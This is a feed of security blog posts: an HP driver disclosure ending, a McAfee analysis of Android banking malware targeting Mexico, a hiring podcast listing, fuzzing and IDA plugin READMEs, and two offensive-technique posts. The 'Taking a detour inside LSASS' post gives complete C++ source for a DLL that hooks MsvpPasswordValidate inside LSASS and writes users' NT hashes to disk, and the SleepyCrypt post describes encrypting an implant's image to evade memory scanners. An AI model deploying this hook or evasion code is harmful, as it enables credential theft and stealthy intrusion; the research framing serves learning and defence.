To reduce the attack surface provided by device drivers with exposed IOCTLs handlers, developers should enforce strong ACLs on device objects, verify user input and not expose a generic interface to kernel mode operations.

Remediation

HP released a Security Advisory on September 14th to address this vulnerability. We recommend customers, both enterprise and consumer, review the HP Security Advisory for complete remediation details.

Conclusion

This high severity vulnerability affects millions of PCs and users worldwide. While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, using any OMEN-branded PC with the vulnerable driver utilized by OMEN Gaming Hub makes the user potentially vulnerable. Therefore, we urge users of OMEN PCs to ensure they take appropriate mitigating measures without delay.

We would like to thank HP for their approach to our disclosure and for remediating the vulnerabilities quickly.

Disclosure Timeline

17, Feb, 2021 – Initial report
17, Feb, 2021 – HP requested more information
14, May, 2021 – HP sent us a fix for validation
16, May, 2021 – SentinelLabs notified HP that the fix was insufficient
07, Jun, 2021 – HP delivered another fix, this time disabling the whole feature
27, Jul, 2021 – HP released an update to the software on the Microsoft Store
14, Sep 2021 – HP released a security advisory for CVE-2021-3437
14, Sep 2021 – SentinelLabs’ research published

Android malware distributed in Mexico uses Covid-19 to steal financial credentials

13 September 2021 at 12:27

Authored by Fernando Ruiz

McAfee Mobile Malware Research Team has identified malware targeting Mexico. It poses as a security banking tool or as a bank application designed to report an out-of-service ATM. In both instances, the malware relies on the sense of urgency created by tools designed to prevent fraud to encourage targets to use them. This malware can steal authentication factors crucial to accessing accounts from their victims on the targeted financial institutions in Mexico. 

McAfee Mobile Security is identifying this threat as Android/Banker.BT along with its variants. 

How does this malware spread? 

The malware is distributed by a malicious phishing page that provides actual banking security tips (copied from the original bank site) and recommends downloading the malicious apps as a security tool or as an app to report out-of-service ATM. It’s very likely that a smishing campaign is associated with this threat as part of the distribution method or it’s also possible that victims may be contacted directly by scam phone calls made by the criminals, a common occurrence in Latin America. Fortunately, this threat has not been identified on Google Play yet. 

Here’s how to protect yourself 

During the pandemic, banks adopted new ways to interact with their clients. These rapid changes meant customers were more willing to accept new procedures and to install new apps as part of the ‘new normal’ to interact remotely. Seeing this, cyber-criminals introduced new scams and phishing attacks that looked more credible than those in the past leaving customers more susceptible. 

Fortunately, McAfee Mobile Security is able to detect this new threat as Android/Banker.BT. To protect yourself from this and similar threats: 

  • Employ security software on your mobile devices  
  • Think twice before downloading and installing suspicious apps especially if they request SMS or Notification listener permissions. 
  • Use official app stores however never trust them blindly as malware may be distributed on these stores too so check for permissions, read reviews and seek out developer information if available. 
  • Use token based second authentication factor apps (hardware or software) over SMS message authentication 

Interested in the details? Here’s a deep dive on this malware 

Figure 1- Phishing malware distribution site that provides security tips
Figure 1- Phishing malware distribution site that provides security tips

Behavior: Carefully guiding the victim to provide their credentials 

Once the malicious app is installed and started, the first activity shows a message in Spanish that explains the fake purpose of the app: 

– Fake Tool to report fraudulent movements that creates a sense of urgency: 

Figure 2- Malicious app introduction that try to lure users to provide their bank credentials
Figure 2- Malicious app introduction that tries to lure users to provide their bank credentials\

“The ‘bank name has created a tool to allow you to block any suspicious movement. All operations listed on the app are still pending. If you fail to block the unrecognized movements in less than 24 hours, then they will charge your account automatically. 

At the end of the blocking process, you will receive an SMS message with the details of the blocked operations.” 

– In the case of the Fake ATM failure tool to request a new credit card under the pandemic context, there is a similar text that lures users into a false sense of security: 

Figure 3- Malicious app introduction of ATM reporting variant that uses the Covid-19 pandemic as pretext to lure users into provide their bank credentials
Figure 3- Malicious app introduction of ATM reporting variant that uses the Covid-19 pandemic as a pretext to lure users into providing their bank credentials

“As a Covid-19 sanitary measure, this new option has been created. You will receive an ID via SMS for your report and then you can request your new card at any branch or receive it at your registered home address for free. Alert! We will never request your sensitive data such as NIP or CVV.”This gives credibility to the app since it’s saying it will not ask for some sensitive data; however, it will ask for web banking credentials. 

If the victims tap on “Ingresar” (“access”) then the banking trojan asks for SMS permissions and launch activity to enter the user id or account number and then the password. In the background, the password or ‘clave’ is transmitted to the criminal’s server without verifying if the provided credentials are valid or being redirected to the original bank site as many others banking trojan does. 

Figure 4- snippet of user entered password exfiltration
Figure 4- snippet of user-entered password exfiltration

Finally, a fixed fake list of transactions is displayed so the user can take the action of blocking them as part of the scam however at this point the crooks already have the victim’s login data and access to their device SMS messages so they are capable to steal the second authentication factor. 

Figure 5- Fake list of fraudulent transactions
Figure 5- Fake list of fraudulent transactions

In case of the fake tool app to request a new card, the app shows a message that says at the end “We have created this Covid-19 sanitary measure and we invite you to visit our anti-fraud tips where you will learn how to protect your account”.  

Figure 6- Final view after the malware already obtained bank credentials reinforcing the concept that this application is a tool created under the covid-19 context.
Figure 6- Final view after the malware already obtained bank credentials reinforcing the concept that this application is a tool created under the covid-19 context.

In the background the malware contacts the command-and-control server that is hosted in the same domain used for distribution and it sends the user credentials and all users SMS messages over HTTPS as query parameters (as part of the URL) which can lead to the sensitive data to be stored in web server logs and not only the final attacker destination. Usually, malware of this type has poor handling of the stolen data, therefore, it’s not surprising if this information is leaked or compromised by other criminal groups which makes this type of threat even riskier for the victims. Actually, in figure 8 there is a partial screenshot of an exposed page that contains the structure to display the stolen data. 

Figure 7 - Malicious method related to exfiltration of all SMS Messages from the victim's device.
Figure 7 – Malicious method related to exfiltration of all SMS Messages from the victim’s device.

Table Headers: Date, From, Body Message, User, Password, Id: 

Figure 8 – Exposed page in the C2 that contains a table to display SMS messages captured from the infected devices.
Figure 8 – Exposed page in the C2 that contains a table to display SMS messages captured from the infected devices.

This mobile banker is interesting due it’s a scam developed from scratch that is not linked to well-known and more powerful banking trojan frameworks that are commercialized in the black market between cyber-criminals. This is clearly a local development that may evolve in the future in a more serious threat since the decompiled code shows accessibility services class is present but not implemented which leads to thinking that the malware authors are trying to emulate the malicious behavior of more mature malware families. From the self-evasion perspective, the malware does not offer any technique to avoid analysis, detection, or decompiling that is signal it’s in an early stage of development. 

IoC 

SHA256: 

  • 84df7daec93348f66608d6fe2ce262b7130520846da302240665b3b63b9464f9 
  • b946bc9647ccc3e5cfd88ab41887e58dc40850a6907df6bb81d18ef0cb340997 
  • 3f773e93991c0a4dd3b8af17f653a62f167ebad218ad962b9a4780cb99b1b7e2 
  • 1deedb90ff3756996f14ddf93800cd8c41a927c36ac15fcd186f8952ffd07ee0 

Domains: 

  • https[://]appmx2021.com 

The post Android malware distributed in Mexico uses Covid-19 to steal financial credentials appeared first on McAfee Blog.

Diversity, equity and inclusion in cybersecurity hiring | Cyber Work Live

By: Infosec
13 September 2021 at 07:00

Cybersecurity hiring managers, and the entire cybersecurity industry, can benefit from recruiting across a wide range of backgrounds and cultures, yet many organizations still struggle with meaningfully implementing effective diversity, equity and inclusion (DEI) hiring processes.

Join a panel of past Cyber Work Podcast guests as they discuss these challenges, as well as the benefits of hiring diversely:
– Gene Yoo, CEO of Resecurity, and the expert brought in by Sony to triage the 2014 hack
– Mari Galloway, co-founder of Women’s Society of Cyberjutsu
– Victor “Vic” Malloy, General Manager, CyberTexas

This episode was recorded live on August 19, 2021. Want to join the next Cyber Work Live and get your career questions answered? See upcoming events here: https://www.infosecinstitute.com/events/

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

The topics covered include:
0:00 - Intro
1:20 - Meet the panel
3:28 - Diversity statistics in cybersecurity
4:30 - Gene on HR's diversity mindset
5:50 - Vic's experience being the "first"
10:00 - Mari's experience as a woman in cybersecurity
12:22 - Stereotypes for women in cybersecurity
15:40 - Misrepresenting the work of cybersecurity
17:30 - HR gatekeeping and bias
25:56- Protecting neurodivergent employees
31:15 - Hiring bias against ethnic names
37:57 - We didn't get any diverse applicants!
43:20 - Lack of developing new talent
46:48 - The skills gap is "nonsense"
49:41- Cracking the C-suite ceiling
53:56 - Visions for the future of cybersecurity
58:15 - Outro

– Join the Infosec Skills monthly challenge: https://www.infosecinstitute.com/challenge

– Download our developing security teams ebook: https://www.infosecinstitute.com/ebook

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Autoharness - A Tool That Automatically Creates Fuzzing Harnesses Based On A Library

By: Zion3R
12 September 2021 at 20:30


AutoHarness is a tool that automatically generates fuzzing harnesses for you. This idea stems from a concurrent problem in fuzzing codebases today: large codebases have thousands of functions and pieces of code that can be embedded fairly deep into the library. It is very hard or sometimes even impossible for smart fuzzers to reach that codepath. Even for large fuzzing projects such as oss-fuzz, there are still parts of the codebase that are not covered in fuzzing. Hence, this program tries to alleviate this problem in some capacity as well as provide a tool that security researchers can use to initially test a code base. This program only supports code bases which are coded in C and C++.


Setup/Demonstration

This program utilizes llvm and clang for libfuzzer, Codeql for finding functions, and python for the general program. This program was tested on Ubuntu 20.04 with llvm 12 and python 3. Here is the initial setup.

sudo apt-get update;
sudo apt-get install python3 python3-pip llvm-12* clang-12 git;
pip3 install pandas lief subprocess os argparse ast;

Follow the installation procedure for Codeql on https://github.com/github/codeql. Make sure to install the CLI tools and the libraries. For my testing, I have stored both the tools and libraries under one folder. Finally, clone this repository or download a release. Here is the program's output after running on nginx with the multiple argument mode set. This is the command I used.

python3 harness.py -L /home/akshat/nginx-1.21.0/objs/ -C /home/akshat/codeql-h/ -M 1 -O /home/akshat/autoharness/ -D nginx -G 1 -Y 1 -F "-I /home/akshat/nginx-1.21.0/objs -I /home/akshat/nginx-1.21.0/src/core -I /home/akshat/nginx-1.21.0/src/event -I /home/akshat/nginx-1.21.0/src/http -I /home/akshat/nginx-1.21.0/src/mail -I /home/akshat/nginx-1.21.0/src/misc -I /home/akshat/nginx-1.21.0/src/os -I /home/akshat/nginx-1.21.0/src/stream -I /home/akshat/nginx-1.21.0/src/os/unix" -X ngx_config.h,ngx_core.h

Results:  

 It is definitely possible to raise the success by further debugging the compilation and adding more header files and more. Note the nginx project does not have any shared objects after compiling. However, this program does have a feature that can convert PIE executables into shared libraries.


Planned Features (in order of progress)

  1. Struct Fuzzing

The current way implemented in the program to fuzz functions with multiple arguments is by using fuzzing data provider. There are some improvements to make in this integration; however, I believe I can incorporate this feature with data structures. A problem which I come across when coding this is with codeql and nested structs. It becomes especially hard without writing multiple queries which vary for every function. In short, this feature needs more work. I was also thinking about a simple solution using protobufs.


  1. Implementation Based Harness Creation

Using codeql, it is possible to use to generate a control flow graph that maps how the parameters in a function are initialized. Using that information, we can create a better harness. Another way is to look for implementations for the function that exist in the library and use that information to make an educated guess on an implementation of the function as a harness. The problems I currently have with this are generating the control flow graphs with codeql.


  1. Parallelized fuzzing/False Positive Detection

I can create a simple program that runs all the harnesses and picks up on any of the common false positives using ASAN. Also, I can create a new interface that runs all the harnesses at once and displays their statistics.


Contribution/Bugs

If you find any bugs with this program, please create an issue. I will try to come up with a fix. Also, if you have any ideas on any new features or how to implement performance upgrades or the current planned features, please create a pull request or an issue with the tag (contribution).


PSA

This tool generates some false positives. Please first analyze the crashes and see if it is valid bug or if it is just an implementation bug. Also, you can enable the debug mode if some functions are not compiling. This will help you understand if there are some header files that you are missing or any linkage issues. If the project you are working on does not have shared libraries but an executable, make sure to compile the executable in PIE form so that this program can convert it into a shared library.


References
  1. https://lief.quarkslab.com/doc/latest/tutorials/08_elf_bin2lib.html


🇬🇧 Taking a detour inside LSASS

By: ["last"]
16 November 2020 at 00:00

TL;DR

This is a repost of an analysis I posted on my Gitbook some time ago. Basically, when you authenticate as ANY local user on Windows, the NT hash of that user is checked against the NT hash of the supplied password by LSASS through the function MsvpPasswordValidate, exported by NtlmShared.dll. If you hook MsvpPasswordValidate you can extract this hash without touching the SAM. Of course, to hook this function in LSASS you need admin privilege. Technically it also works for domain users who have logged on the machine at least once, but the resulting hash is not a NT hash, but rather a MSCACHEv2 hash.

Introduction

Last August FuzzySec tweeted something interesting:

fuzzysec tweet

Since I had some spare time I decided to look into it and try and write my own local password dumping utility. But first, I had to confirm this information.

Confirming the information

To do so, I fired up a Windows 10 20H2 VM, set it up for kernel debugging and set a breakpoint into lsass.exe at the start of MsvpPasswordValidate (part of the NtlmShared.dll library) through WinDbg. But first you have to find LSASS’ _EPROCESS address using the following command:

!process 0 0 lsass.exe

process command

Once the _EPROCESS address is found we have to switch WinDbg’s context to the target process (your address will be different):

.process /i /p /r ffff8c05c70bc080

process command 2

Remember to use the g command right after the last command to make the switch actually happen. Now that we are in LSASS’ context we can load into the debugger the user mode symbols, since we are in kernel debugging, and then place a breakpoint at NtlmShared!MsvpPasswordValidate:

.reload /user
bp NtlmShared!MsvpPasswordValidate

We can make sure our breakpoint has been set by using the bl command:

bl command

Before we go on however we need to know what to look for. MsvpPasswordValidate is an undocumented function, meaning we won’t find it’s definition on MSDN. Looking here and there on the interwebz I managed to find it on multiple websites, so here it is:

BOOLEAN __stdcall MsvpPasswordValidate (
     BOOLEAN UasCompatibilityRequired,
     NETLOGON_LOGON_INFO_CLASS LogonLevel,
     PVOID LogonInformation,
     PUSER_INTERNAL1_INFORMATION Passwords,
     PULONG UserFlags,
     PUSER_SESSION_KEY UserSessionKey,
     PLM_SESSION_KEY LmSessionKey
);

What we are looking for is the fourth argument. The “Passwords” argument is of type PUSER_INTERNAL1_INFORMATION. This is a pointer to a SAMPR_USER_INTERNAL1_INFORMATION structure, whose first member is the NT hash we are looking for:

typedef struct _SAMPR_USER_INTERNAL1_INFORMATION {
   ENCRYPTED_NT_OWF_PASSWORD EncryptedNtOwfPassword;
   ENCRYPTED_LM_OWF_PASSWORD EncryptedLmOwfPassword;
   unsigned char NtPasswordPresent;
   unsigned char LmPasswordPresent;
   unsigned char PasswordExpired;
 } SAMPR_USER_INTERNAL1_INFORMATION, *PSAMPR_USER_INTERNAL1_INFORMATION;

As MsvpPasswordValidate uses the stdcall calling convention, we know the Passwords argument will be stored into the R9 register, hence we can get to the actual structure by dereferencing the content of this register. With this piece of information we type g once more in our debugger and attempt a login through the runas command:

runas command

And right there our VM froze because we hit the breakpoint we previously set:

breakpoint hit

Now that our CPU is where we want it to be we can check the content of R9:

db @r9

db command

That definetely looks like a hash! We know our test user uses “antani” as password and its NT hash is 1AC1DBF66CA25FD4B5708E873E211F06, so the extracted value is the correct one.

Writing the DLL

Now that we have verified FuzzySec’s hint we can move on to write our own password dumping utility. We will write a custom DLL which will hook MsvpPasswordValidate, extract the hash and write it to disk. This DLL will be called HppDLL, since I will integrate it in a tool I already made (and which I will publish sooner or later) called HashPlusPlus (HPP for short). We will be using Microsoft Detours to perform the hooking action, better not to use manual hooking when dealing with critical processes like LSASS, as crashing will inevitably lead to a reboot. I won’t go into details on how to compile Detours and set it up, it’s pretty straightforward and I will include a compiled Detours library into HppDLL’s repository. The idea here is to have the DLL hijack the execution flow as soon as it reaches MsvpPasswordValidate, jump to a rogue routine which we will call HookMSVPPValidate and that will be responsible for extracting the credentials. Done that, HookMSVPPValidate will return to the legitimate MsvpPasswordValidate and continue the execution flow transparently for the calling process. Complex? Not so much actually.

Hppdll.h

We start off by writing the header all of the code pieces will include:

#pragma once
#define SECURITY_WIN32
#define WIN32_LEAN_AND_MEAN

// uncomment the following definition to enable debug logging to c:\debug.txt
#define DEBUG_BUILD

#include <windows.h>
#include <SubAuth.h>
#include <iostream>
#include <fstream>
#include <string>
#include "detours.h"

// if this is a debug build declare the PrintDebug() function
// and define the DEBUG macro in order to call it
// else make the DEBUG macro do nothing
#ifdef DEBUG_BUILD
void PrintDebug(std::string input);
#define DEBUG(x) PrintDebug(x)
#else
#define DEBUG(x) do {} while (0)
#endif

// namespace containing RAII types to make sure handles are always closed before detaching our DLL
namespace RAII
{
	class Library
	{
	public:
		Library(std::wstring input);
		~Library();
		HMODULE GetHandle();

	private:
		HMODULE _libraryHandle;
	};

	class Handle
	{
	public:
		Handle(HANDLE input);
		~Handle();
		HANDLE GetHandle();

	private:
		HANDLE _handle;
	};
}

//functions used to install and remove the hook
bool InstallHook();
bool RemoveHook();

// define the pMsvpPasswordValidate type to point to MsvpPasswordValidate
typedef BOOLEAN(WINAPI* pMsvpPasswordValidate)(BOOLEAN, NETLOGON_LOGON_INFO_CLASS, PVOID, void*, PULONG, PUSER_SESSION_KEY, PVOID);
extern pMsvpPasswordValidate MsvpPasswordValidate;

// define our hook function with the same parameters as the hooked function
// this allows us to directly access the hooked function parameters
BOOLEAN HookMSVPPValidate
(
	BOOLEAN UasCompatibilityRequired,
	NETLOGON_LOGON_INFO_CLASS LogonLevel,
	PVOID LogonInformation,
	void* Passwords,
	PULONG UserFlags,
	PUSER_SESSION_KEY UserSessionKey,
	PVOID LmSessionKey
);

This header includes various Windows headers that define the various native types used by MsvpPasswordValidate. You can see I had to slightly modify the MsvpPasswordValidate function definition since I could not find the headers defining PUSER_INTERNAL1_INFORMATION, hence we treat it like a normal void pointer. I also define two routines, InstallHook and RemoveHook, that will deal with injecting our hook and cleaning it up afterwards. I also declare a RAII namespace which will hold RAII classes to make sure handles to libraries and other stuff will be properly closed as soon as they go out of scope (yay C++). I also define a pMsvpPasswordValidate type which we will use in conjunction with GetProcAddress to properly resolve and then call MsvpPasswordValidate. Since the MsvpPasswordValidate pointer needs to be global we also extern it.

DllMain.cpp

The DllMain.cpp file holds the definition and declaration of the DllMain function, responsible for all the actions that will be taken when the DLL is loaded or unloaded:

#include "pch.h"
#include "hppdll.h"

pMsvpPasswordValidate MsvpPasswordValidate = nullptr;

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        return InstallHook();
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        return RemoveHook();
    }
    return TRUE;
}

Top to bottom, we include pch.h to enable precompiled headers and speed up compilation, and hppdll.h to include all the types and functions we defined earlier. We also set to nullptr the MsvpPasswordValidate function pointer, which will be filled later by the InstallHook function with the address of the actual MsvpPasswordValidate. You can see that InstallHook gets called when the DLL is loaded and RemoveHook is called when the DLL is unloaded.

InstallHook.cpp

InstallHook is the function responsible for actually injecting our hook:

#include "pch.h"
#include "hppdll.h"

bool InstallHook()
{
	DEBUG("InstallHook called!");

	// get a handle on NtlmShared.dll
	RAII::Library ntlmShared(L"NtlmShared.dll");
	if (ntlmShared.GetHandle() == nullptr)
	{
		DEBUG("Couldn't get a handle to NtlmShared");
		return false;
	}

	// get MsvpPasswordValidate address
	MsvpPasswordValidate = (pMsvpPasswordValidate)::GetProcAddress(ntlmShared.GetHandle(), "MsvpPasswordValidate");
	if (MsvpPasswordValidate == nullptr)
	{
		DEBUG("Couldn't resolve the address of MsvpPasswordValidate");
		return false;
	}

	DetourTransactionBegin();
	DetourUpdateThread(::GetCurrentThread());
	DetourAttach(&(PVOID&)MsvpPasswordValidate, HookMSVPPValidate);
	LONG error = DetourTransactionCommit();
	if (error != NO_ERROR)
	{
		DEBUG("Failed to hook MsvpPasswordValidate");
		return false;
	}
	else
	{
		DEBUG("Hook installed successfully");
		return true;
	}
}

It first gets a handle to the NtlmShared DLL at line 9. At line 17 the address to the beginning of MsvpPasswordValidate is resolved by using GetProcAddress, passing to it the handle to NtlmShared and a string containing the name of the function. At lines from 24 to 27 Detours does its magic and replaces MsvpPasswordValidate with our rogue HookMSVPPValidate function. If the hook is installed correctly, InstallHook returns true. You may have noticed I use the DEBUG macro to print debug information. This macro makes use of conditional compilation to write to C:\debug.txt if the DEBUG_BUILD macro is defined in hppdll.h, otherwise it does nothing.

HookMSVPPValidate.cpp

Here comes the most important piece of the DLL, the routine responsible for extracting the credentials from memory.

#include "pch.h"
#include "hppdll.h"

BOOLEAN HookMSVPPValidate(BOOLEAN UasCompatibilityRequired, NETLOGON_LOGON_INFO_CLASS LogonLevel, PVOID LogonInformation, void* Passwords, PULONG UserFlags, PUSER_SESSION_KEY UserSessionKey, PVOID LmSessionKey)
{
	DEBUG("Hook called!");
	// cast LogonInformation to NETLOGON_LOGON_IDENTITY_INFO pointer
	NETLOGON_LOGON_IDENTITY_INFO* logonIdentity = (NETLOGON_LOGON_IDENTITY_INFO*)LogonInformation;

	// write to C:\credentials.txt the domain, username and NT hash of the target user
	std::wofstream credentialFile;
	credentialFile.open("C:\\credentials.txt", std::fstream::in | std::fstream::out | std::fstream::app);
	credentialFile << L"Domain: " << logonIdentity->LogonDomainName.Buffer << std::endl;
	std::wstring username;
	
	// LogonIdentity->Username.Buffer contains more stuff than the username
	// so we only get the username by iterating on it only Length/2 times 
	// (Length is expressed in bytes, unicode strings take two bytes per character)
	for (int i = 0; i < logonIdentity->UserName.Length/2; i++)
	{
		username += logonIdentity->UserName.Buffer[i];
	}
	credentialFile << L"Username: " << username << std::endl;
	credentialFile << L"NTHash: ";
	for (int i = 0; i < 16; i++)
	{
		unsigned char hashByte = ((unsigned char*)Passwords)[i];
		credentialFile << std::hex << hashByte;
	}
	credentialFile << std::endl;
	credentialFile.close();

	DEBUG("Hook successfully called!");
	return MsvpPasswordValidate(UasCompatibilityRequired, LogonLevel, LogonInformation, Passwords, UserFlags, UserSessionKey, LmSessionKey);
}

We want our output file to contain information on the user (like the username and the machine name) and his NT hash. To do so we first cast the third argument, LogonIdentity, to be a pointer to a NETLOGON_LOGON_IDENTITY_INFO structure. From that we extract the logonIdentity->LogonDomainName.Buffer field, which holds the local domain (hece the machine hostname since it’s a local account). This happens at line 8. At line 13 we write the extracted local domain name to the output file, which is C:\credentials.txt. As a side note, LogonDomainName is a UNICODE_STRING structure, defined like so:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

From line 19 to 22 we iterate over logonIdentity->Username.Buffer for logonIdentity->Username.Length/2 times. We have to do this, and not copy-paste directly the content of the buffer like we did with the domain, because this buffer contains the username AND other garbage. The Length field tells us where the username finishes and the garbage starts. Since the buffer contains unicode data, every character it holds actually occupies 2 bytes, so we need to iterate half the times over it. From line 25 to 29 we proceed to copy the first 16 bytes held by the Passwords structure (which contain the actual NT hash as we saw previously) and write them to the output file. To finish we proceed to call the actual MsvpPasswordValidate and return its return value at line 34 so that the authentication process can continue unimpeded.

RemoveHook.cpp

The last function we will take a look at is the RemoveHook function.

#include "pch.h"
#include "hppdll.h"

bool RemoveHook()
{
	DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());
	DetourDetach(&(PVOID&)MsvpPasswordValidate, HookMSVPPValidate);
	auto error = DetourTransactionCommit();
	if (error != NO_ERROR)
	{
		DEBUG("Failed to unhook MsvpPasswordValidate");
		return false;
	}
	else
	{
		DEBUG("Hook removed!");
		return true;
	}
}

This function too relies on Detours magic. As you can see lines 6 to 9 are very similar to the ones called by InstallHook to inject our hook, the only difference is that we make use of the DetourDetach function instead of the DetourAttach one.

Test drive!

Alright, now that everything is ready we can proceed to compile the DLL and inject it into LSASS. For rapid prototyping I used Process Hacker for the injection.

hppdll gif

It works! This time I tried to authenticate as the user “last”, whose password is, awkwardly, “last”. You can see that even though the wrong password was input for the user, the true password hash has been written to C:\credentials. That’s all folks, it was a nice ride. You can find the complete code for HppDLL on my GitHub.

last out!

Karta - Source Code Assisted Fast Binary Matching Plugin For IDA

By: Zion3R
11 September 2021 at 11:30


"Karta" (Russian for "Map") is an IDA Python plugin that identifies and matches open-sourced libraries in a given binary. The plugin uses a unique technique that enables it to support huge binaries (>200,000 functions), with almost no impact on the overall performance.

The matching algorithm is location-driven. This means that it's main focus is to locate the different compiled files, and match each of the file's functions based on their original order within the file. This way, the matching depends on K (number of functions in the open source) instead of N (size of the binary), gaining a significant performance boost as usually N >> K.

We believe that there are 3 main use cases for this IDA plugin:

  1. Identifying a list of used open sources (and their versions) when searching for a useful 1-Day
  2. Matching the symbols of supported open sources to help reverse engineer a malware
  3. Matching the symbols of supported open sources to help reverse engineer a binary / firmware when searching for 0-Days in proprietary code

Read The Docs

https://karta.readthedocs.io/


Installation (Python 3 & IDA >= 7.4)

For the latest versions, using Python 3, simply git clone the repository and run the setup.py install script. Python 3 is supported since versions v2.0.0 and above.


Installation (Python 2 & IDA < 7.4)

As of the release of IDA 7.4, Karta is only actively developed for IDA 7.4 or newer, and Python 3. Python 2 and older IDA versions are still supported using the release version v1.2.0, which is most probably going to be the last supported version due to python 2.X end of life.


Identifier

Karta's identifier is a smaller plugin that identifies the existence, and fingerprints the versions, of the existing (supported) open source libraries within the binary. No more need to reverse engineer the same open-source library again-and-again, simply run the identifier plugin and get a detailed list of the used open sources. Karta currently supports more than 10 open source libraries, including:

  • OpenSSL
  • Libpng
  • Libjpeg
  • NetSNMP
  • zlib
  • Etc.

Matcher

After identifying the used open sources, one can compile a .JSON configuration file for a specific library (libpng version 1.2.29 for instance). Once compiled, Karta will automatically attempt to match the functions (symbols) of the open source in the loaded binary. In addition, in case your open source used external functions (memcpy, fread, or zlib_inflate), Karta will also attempt to match those external functions as well.


Folder Structure
  • src: source directory for the plugin
  • configs: pre-supplied *.JSON configuration files (hoping the community will contribute more)
  • compilations: compilation tips for generating the configuration files, and lessons from past open sources
  • docs: sphinx documentation directory

Additional Reading

Credits

This project was developed by me (see contact details below) with help and support from my research group at Check Point (Check Point Research).


Contact (Updated)

This repository was developed and maintained by me, Eyal Itkin, during my years at Check Point Research. Sadly, with my departure of the research group, I will no longer be able to maintain this repository. This is mainly because of the long list of requirements for running all of the regression tests, and the IDA Pro versions that are involved in the process.

Please accept my sincere apology.

@EyalItkin



SleepyCrypt: Encrypting a running PE image while it sleeps

10 September 2021 at 15:20

SleepyCrypt: Encrypting a running PE image while it sleeps

Introduction

In the course of building a custom C2 framework, I frequently find features from other frameworks I’d like to implement. Cobalt Strike is obviously a major source of inspiration, given its maturity and large feature set. The only downside to re-implementing features from a commercial C2 is that you have no code or visibility into how a feature is implemented. This downside is also an learning excellent opportunity.

One such feature is Beacon’s ability to encrypt its loaded image in memory while it sleeps. It does this to prevent memory scanning from identifying static data and other possible indicators within the image while Beacon is inactive. Since during sleep no code or data is used, it can be encrypted, and only decrypted and visible in memory for the shortest time necessary. Another similar idea is heap encryption, which encrypts any dynamically allocated memory during sleep. A great writeup on this topic was published recently by Waldo-IRC and is available here.

So I set out to create a proof of concept to encrypt the loaded image of a process periodically while that process is sleeping, similar to how a Beacon or implant would.

The code for this post is available here.

Starting A Process

To get an idea of the challenges we have to overcome, let’s examine how an image is situated in memory when a process is running.

During process creation, the Windows loader takes the PE file from disk and maps it into memory. The PE headers tell the loader about the number of sections the file contains, their sizes, memory protections, etc. Using this information, each section is mapped by the loader into an area of memory, and that memory is given a specific memory protection value. These values can be a combination of read, write, and execute, along with a bunch of other values that aren’t relevant for now. The various sections tend to have consistent memory protection values; for instance, the .text sections contains most of the executable code of the program, and as such needs to be read and executed, but not written to. Thus its memory is given Read eXecute protections. The .rdata section however, contains read-only data, so it is given only Read memory protection.

Section Protection

Why do we care about the memory protection of the different PE sections? Because we want to encrypt them, and to do that, we need to be able to both read and write to them. By default, most sections are not writable. So we will need to change the protections of each section to at least RW, and then change them back to their original protection values. If we don’t change them back to their proper values, the program could possibly crash or look suspicious in memory. Every single section being writable is not a common occurrence!

How Can You Run Encrypted Code?

Another challenge we need to tackle is encrypting the .text section. Since it contains all the executable code, if we encrypt it, the assembly becomes gibberish and the code can no longer run. But we need the code to run to encrypt the section. So it’s a bit of a chicken and the egg problem. Luckily there’s a simple solution: use the heap! We can allocate a buffer of memory dynamically, which will reside inside our process address space, but outside of the .text section. But how do we get our C code into that heap buffer to run when it’s always compiled into .text? One word: shellcode.

Ugh, Shellcode??

I know we all love writing complex shellcode by hand, but for this project I am going to cheat and use C to create the shellcode for me. ParanoidNinja has a fantastic blog post on exactly this subject, and I will borrow heavily from that post to create my shellcode.

But what does this shellcode need to do exactly? It has two primary functions: encrypt and decrypt the loaded image, and sleep. So we will write a small C function that takes a pointer to the base address of the loaded image and a length of time to sleep. It will change the memory protections of the sections, encrypt them, sleep for the configured time, and then decrypt everything and return.

Putting It All Together

So the final flow of our program looks like this:

- Generate the shellcode from our C program and include it as a char buffer in our main test program called `sleep.exe`
- In `sleep.exe`, we allocate heap memory for the shellcode and copy it over
- We get the base address of our image and the desired sleep time
- We use the pointer to the heap buffer as a function pointer and call the shellcode like a function, passing in a parameter
- The shellcode will run, encrypt the image, sleep, decrypt, and then return
- We're back inside the `.text` section of `sleep.exe`, so we can continue to do our thing until we want to sleep and repeat the process again

Sleep.exe

Since it’s the simplest, let’s start with a rundown of sleep.exe.

First off, we include the shellcode as a header file. This is generated from the raw binary (which we’ll cover shortly) with xxd -i shellcode.bin > shellcode.h. Then we define the struct we will use as a parameter to the shellcode function, which is called simply run. The struct contains a pointer for the image base address, a DWORD for the sleep time, and a pointer to MessageBoxA, so we can have some visible output from the shellcode. In a real implant you would probably want to omit this. Lastly we create a function pointer typedef, so we can call the shellcode buffer like a normal function.

Struct in sleep.c

Next we begin our main function. We take in a command line parameter with the sleep time, dynamically resolve MessageBoxA, get the image base address with GetModuleHandleA( NULL ), and setup the parameter struct. Then we allocate our heap buffer and copy the shellcode payload into it:

Setup in sleep.c

Finally we create a function pointer to the shellcode buffer, wait for a keypress so we have time to check things out in Process Hacker, and then we execute the shellcode. If all goes well, it will sleep for our configured time and return back to sleep.exe, popping some message boxes in the process. Then we’ll press another key to exit, showing that we do indeed have execution back in the .text section.

Run in sleep.c

C First, Then Shellcode

Now we write the C function that will end up as our position-independent shellcode. ParanoidNinja covers this pretty well in his post, so I won’t rehash it all here, but I will mention some salient points we’ll need to account for.

